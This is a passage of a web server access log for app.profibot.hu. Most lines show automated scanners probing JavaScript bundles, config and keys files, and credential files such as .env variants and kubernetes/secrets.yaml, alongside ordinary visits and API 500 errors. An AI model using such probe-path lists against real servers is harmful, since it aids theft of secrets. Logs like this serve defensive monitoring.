-] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/build/entry.client.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/checkout.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/dist/bundle.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_nuxt/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/build/manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/asset-manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/sw.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/static/js/2.chunk.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/astro.config.mjs" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/svelte.config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/window.env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/2.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/development/pages/_app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/assets/js/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/cart" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_app/immutable/chunks/index.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/@vite/client" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/1.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_app/immutable/entry/start.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/static/js/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/payment.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/api.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/dist/.vite/manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/build/root.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/0.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/runtime.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/js/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/bundle.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/dist/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/index.html" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/page-data/app-data.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_astro/client.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/dist/solid.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/keys.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/payment" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/assets/index.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/remix.config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/api/v1/config" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/workbox.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/assets/js/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/src/constants.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/config.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/framework.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/__ENV.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/static/js/5.chunk.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/static/js/runtime-main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/runtime~main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/assets/vendor.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/js/config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/env-config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/.astro/types.d.ts" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/_nuxt/config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/keys.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/static/js/main.chunk.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/webpack.runtime.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/bundle.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/constants.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/src/config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:40 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/webpack.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:14:30 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.248.137.227] [Length 5489] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" +[20/Jan/2026:22:14:30 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.248.137.227] [Length 5489] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" +[20/Jan/2026:22:14:30 +0000] - 200 200 - GET https app.profibot.hu "/api/my_vehicles" [Client 34.248.137.227] [Length 138] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:22:14:30 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 34.248.137.227] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:22:14:30 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.248.137.227] [Length 5489] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[20/Jan/2026:22:14:31 +0000] - 404 404 - HEAD https app.profibot.hu "/favicon.ico" [Client 34.248.137.227] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[20/Jan/2026:22:30:40 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 23.27.145.203] [Length 5489] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[20/Jan/2026:22:44:52 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.91.119.153] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[20/Jan/2026:23:16:05 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.40.64] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:16:06 +0000] - 500 500 - GET https app.profibot.hu "/api/my_vehicles" [Client 37.76.40.64] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:23:16:06 +0000] - 500 500 - GET https app.profibot.hu "/api/ref/cost_types" [Client 37.76.40.64] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:23:16:09 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.40.64] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:16:09 +0000] - 500 500 - GET https app.profibot.hu "/api/ref/cost_types" [Client 37.76.40.64] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:23:16:09 +0000] - 500 500 - GET https app.profibot.hu "/api/my_vehicles" [Client 37.76.40.64] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:23:16:14 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.40.64] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:16:14 +0000] - 500 500 - GET https app.profibot.hu "/api/my_vehicles" [Client 37.76.40.64] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:23:16:14 +0000] - 500 500 - GET https app.profibot.hu "/api/ref/cost_types" [Client 37.76.40.64] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:23:16:15 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.81.228] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[20/Jan/2026:23:16:15 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.81.228] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[20/Jan/2026:23:16:15 +0000] - 500 500 - GET https app.profibot.hu "/api/my_vehicles" [Client 66.249.81.229] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://app.profibot.hu/" +[20/Jan/2026:23:16:15 +0000] - 500 500 - GET https app.profibot.hu "/api/ref/cost_types" [Client 66.249.81.228] [Length 21] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://app.profibot.hu/" +[20/Jan/2026:23:16:15 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 74.125.210.169] [Length 5712] [Gzip 3.25] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[20/Jan/2026:23:35:30 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 23.27.145.170] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:40:30 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:40:31 +0000] - 502 502 - GET https app.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:40:31 +0000] - 502 502 - GET https app.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:40:31 +0000] - 502 502 - GET https app.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.local" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/config/.env.local" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/kubernetes/secrets.yaml" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/common/.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/settings.env" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.netlify/state.json" [Client 216.81.248.172] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:23:59:24 +0000] - 404 404 - GET http app.profibot.hu "/.env.2025-02" [Client 216.81.248.172] [Length 22] [Gzip -] 